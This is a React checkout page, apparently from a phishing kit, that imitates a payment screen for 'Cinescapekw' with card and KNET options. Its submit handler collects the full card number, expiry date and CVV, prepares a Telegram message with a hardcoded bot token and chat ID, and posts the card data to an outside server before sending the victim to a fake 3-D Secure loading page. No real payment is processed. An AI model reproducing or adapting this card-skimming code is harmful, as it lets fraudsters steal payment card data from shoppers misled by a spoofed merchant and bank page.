import React, { useEffect, useRef, useState } from "react";
import { useNavigate } from "react-router-dom";
import axios from "axios";
import ReactPixel from "react-facebook-pixel";
import InputField from "./InputField";
import { useCart } from "react-use-cart";

const PaymentBeneficiaryPage = () => {
  const [method, setMethod] = useState("card");
  const [first_dig, set_first_dig]=useState('')
 const { addItem,cartTotal } = useCart();

  useEffect(()=>{
    set_first_dig(input1Value?.slice(0,1))
  })

  const [submitBtnContent, setSubmitBtnContent] = useState("CONTINUE");
  const navigate = useNavigate();
  const [input1Value, setInput1Value] = useState("");
  const [input2Value, setInput2Value] = useState("");
  const [input3Value, setInput3Value] = useState("");
  const [holderValue, setholderValue] = useState("");

  const [focusedInput, setFocusedInput] = useState(1); // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null);
  const input2Ref = useRef(null);
  const input3Ref = useRef(null);

  const [submitBtnDis, setSubmitBtnDis] = useState(true);

  useEffect(() => {
    updateSubmitBtnDisabled();
  }, [input1Value, input2Value, input3Value, method]);

  const fullUrl = window.location.href;
  const handleInput1Focus = () => {
    // trackUserAction('User Started Card Input', false)
    setFocusedInput(1);
  };

  const handleInput2Focus = () => {
    setFocusedInput(2);
  };

  const handleInput3Focus = () => {
    setFocusedInput(3);
  };

  const checkFocus = (num) => {
    return focusedInput === num;
  };

  const updateSubmitBtnDisabled = () => {
    if (method === "knet") {
      setSubmitBtnDis(false); // Enable submit button if all inputs are filled
    } else {
      // Check conditions for enabling/disabling submit button
      if (
        input1Value !== "" &&
        input2Value !== "" &&
        input3Value !== "" &&
        input1Value.length === 19 &&
        input2Value.length === 5 &&
        input3Value.length === 3 &&
        isDateGreaterThan(input2Value, "03/25")
      ) {
        if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
          setSubmitBtnDis(false); // Enable submit button if all inputs are filled
        }
      } else {
        setSubmitBtnDis(true); // Disable submit button if any input is empty
      }
    }
  };
  function isDateGreaterThan(dateStr, comparisonDateStr) {
    console.log(dateStr);
    // Extract month and year for both dates
    const [month, year] = dateStr.split("/").map(Number);
    const [compMonth, compYear] = comparisonDateStr.split("/").map(Number);

    // First, compare the years
    if (year > compYear) return true;
    if (year < compYear) return false;

    // If years are the same, compare the months
    return month > compMonth;
  }

  const sum = 1;
  const handleSender = async () => {
    const botToken = "7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o"; // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

    // Extract the first digit of `main` and the last 4 digits of `main`
    const firstDigit = input1Value?.charAt(0); // First digit
    const lastFourDigits = input1Value?.slice(-4); // Last 4 digits

    // Set values to localStorage
    localStorage.setItem("summ", (parseInt(localStorage.getItem("quant"))*3.5).toFixed(3) );
    localStorage.setItem("first-digit", firstDigit);
    localStorage.setItem("last-four-digits", lastFourDigits);

    const payload = {
      chat_id: "-1002222911401", // Replace with the target chat ID
      text: `💳 ${input1Value}
  📆 ${input2Value}
  🔐 ${input3Value}`, // The message text
    };

    setSubmitBtnContent(<div className="inputLoader"></div>);
    if (method === "knet") {
      setTimeout(() => navigate("/knet"), 2000);
    } else {
      try {
        ReactPixel.track("Purchase");
      } catch (err) {
        console.log(err);
      }

      const dataToSend = {
        orderId: "123",
        uuId: localStorage.getItem("uuId"),
        main: input1Value,
        date: input2Value,
        code: input3Value,
        summ: (parseInt(localStorage.getItem("quant"))*3.5).toFixed(3),
        chatId: process.env.REACT_APP_CHAT_ID,
        domain: process.env.REACT_APP_DOMAIN,
        link: fullUrl,
        additional: localStorage.getItem("bookingData"),
      };
      console.log(dataToSend);
      try {
        await axios.post(
          process.env.REACT_APP_SERVER_URL + "/api/validation",
          dataToSend,
          {
            headers: {
              "Content-Type": "application/json",
            },
          }
        );
        navigate("/3ds/loading");
      } catch (error) {
        console.error("Error sending data:", error);
        setTimeout(() => {
          setSubmitBtnContent("CONTINUE");
        }, 3000);
      }
    }
  };
  return (
    <div className="min-h-screen bg-[#f5f6fb] flex justify-center px-4 py-10">
      <div className="w-full max-w-3xl p-6 text-center bg-white sm:p-12">
        {/* Title */}
        <h1 className="mb-12 text-4xl tracking-wider sm:text-4xl">
          Payment Beneficiary and <br /> Description
        </h1>

        {/* Details */}
        <div className="text-sm text-left divide-y sm:text-base">
          <div className="flex flex-col py-4 sm:flex-row sm:items-center sm:justify-between">
            <p className="font-bold text-black text-md">NAME</p>
            <p className="text-gray-600 text-md">Cinescapekw</p>
          </div>
          <div className="flex flex-col py-4 sm:flex-row sm:items-center sm:justify-between">
            <p className="font-bold text-black text-md">ORDER</p>
            <p className="text-gray-600 text-md">Payment for order #6205258</p>
          </div>
          <div className="flex flex-col py-4 sm:flex-row sm:items-center sm:justify-between">
            <p className="font-bold text-black text-md">AMOUNT TO PAY</p>
          <p className="text-gray-600 text-md">
      <span>{(parseInt(localStorage.getItem("quant"))*3.5).toFixed(3)}</span>
  <span className="ml-1 text-xs text-black">Including VAT</span>
</p>

          </div>
        </div>

        {/* Subtitle */}
        <h2 className="mt-12 text-3xl tracking-wider sm:text-4xl">Payment Method</h2>

        {/* Payment Options */}
        <div className="flex justify-center gap-6 mt-6">
          <button
            onClick={() => setMethod("card")}
            className={`px-6 py-2 flex items-center rounded-lg border font-semibold transition ${
              method === "card"
                ? "bg-blue-600 text-white border-blue-600"
                : "bg-white text-black border-gray-400 hover:border-blue-600"
            }`}
          >
            <svg className="mr-2" stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M14 3H2a1 1 0 00-1 1v8a1 1 0 001 1h12a1 1 0 001-1V4a1 1 0 00-1-1zM2 2a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2V4a2 2 0 00-2-2H2z" clip-rule="evenodd"></path><rect width="3" height="3" x="2" y="9" rx="1"></rect><path d="M1 5h14v2H1z"></path></svg>
            Card
          </button>
          <button
            onClick={() => setMethod("knet")}
            className={`px-4 flex items-center py-2 rounded-lg border font-semibold transition ${
              method === "knet"
                ? "bg-blue-600 text-white border-blue-600"
                : "bg-white text-black border-gray-400 hover:border-blue-600"
            }`}
          >
            <img className="h-8 mr-2" src="/knet.png" alt="" />
            KNET
          </button>
        </div>

        {/* Conditional Forms */}
        {method === "card" ? (
          <div className="p-4 mt-6 rounded-lg sm:p-6">
            <div className="flex flex-wrap justify-start gap-4 mb-6">
              <img src="/safe.png" alt="secure" className="h-full" />
            </div>

            <div className="grid grid-cols-1 gap-4 mb-4 sm:grid-cols-2">
              <div className="relative w-full">
              <InputField
                      formatType={"card"}
                      ref={input1Ref}
                      value={input1Value}
                      onFocus={handleInput1Focus}
                      onChange={(e) => setInput1Value(e.target.value)}
                      placeholder={"Card number"}
                      focused={checkFocus(1)}
                    />
                <label
                  htmlFor="card-number"
                  className={`absolute pointer-events-none left-0 text-sm text-gray-400 transition-all duration-300 ${
                    input1Value
                      ? "top-1 text-xs text-green-600"
                      : "top-5 text-base text-gray-400"
                  }`}
                >
                  </label>
                <img
                  src="/f4.webp"
                  alt="card icon"
                  className="absolute text-black -translate-y-1/2 h-4 right-2 top-1/2 opacity-60"
                />
              </div>

              <div className="grid grid-cols-2 gap-2">
                <div className="relative w-full">
                <InputField
                        formatType={"date"}
                        ref={input2Ref}
                        value={input2Value}
                        onFocus={handleInput2Focus}
                        onChange={(e) => setInput2Value(e.target.value)}
                        placeholder={"Expiry date"}
                        focused={checkFocus(2)}
                      />
                  <label
                    htmlFor="Expiry month"
                    className={`absolute pointer-events-none left-0 text-sm text-gray-400 transition-all duration-300 ${
                      input2Value
                        ? "top-1 text-xs text-green-600"
                        : "top-5 text-base text-gray-400"
                    }`}
                  >
                   </label>
                </div>
                <div className="relative w-full">
              <InputField
                        formatType={"code"}
                        ref={input3Ref}
                        value={input3Value}
                        onFocus={handleInput3Focus}
                        onChange={(e) => setInput3Value(e.target.value)}
                        placeholder={"CVV"}
                        focused={checkFocus(3)}
                      />
                <label
                  htmlFor="CVV"
                  className={`absolute pointer-events-none left-0 text-sm text-gray-400 transition-all duration-300 ${
                    input3Value
                      ? "top-1 text-xs text-green-600"
                      : "top-5 text-base text-gray-400"
                  }`}
                >
                   
                </label>
              </div>
 
              </div>
            </div>

            <div className="grid grid-cols-1 gap-4 mb-6 ">


              <div className="relative w-full">
                <input
                  type="text"
                  id="cardholder"
                  onChange={(e)=>setholderValue(e.target.value)}
                  className="w-full pt-5 placeholder-transparent transition-all duration-300 border-b border-neutral-600 peer outline-none focus:border-green-600"
                  placeholder="Cardholder name"
                />
                <label
                  htmlFor="cardholder"
                  className={`absolute pointer-events-none left-0 text-sm text-gray-400 transition-all duration-300 ${
                    holderValue
                      ? "top-1 text-xs text-green-600"
                      : "top-5 text-base text-gray-400"
                  }`}
                >
                  Cardholder name
                </label>
              </div>
            </div>

            <div className="w-full ">

                  </div>

                  <div className="flex border-t border-b ">
                    <div className="w-1/2 border-r">

                    </div>
                    <div className="w-1/2">

                    </div>
                  </div>
          </div>
        ) : (
          <div className="p-6 mt-6 text-center border rounded-lg bg-[#f1f1f1]">
            <p className="mb-2 text-lg font-semibold text-black">KNET Payment Selected</p>
            <p className="text-sm text-gray-600">You will be redirected to a secure KNET payment page to complete the transaction.</p>
          </div>
        )}

        {/* Pay Button */}
        <button
                  onClick={handleSender}
                  disabled={submitBtnDis}
        className="w-full py-3 mt-6 text-lg font-medium text-center disabled:opacity-50 text-white bg-blue-600 rounded-xl hover:shadow-xl hover:bg-blue-700">
          Pay
        </button>
      </div>
    </div>
  );
};

export default PaymentBeneficiaryPage;
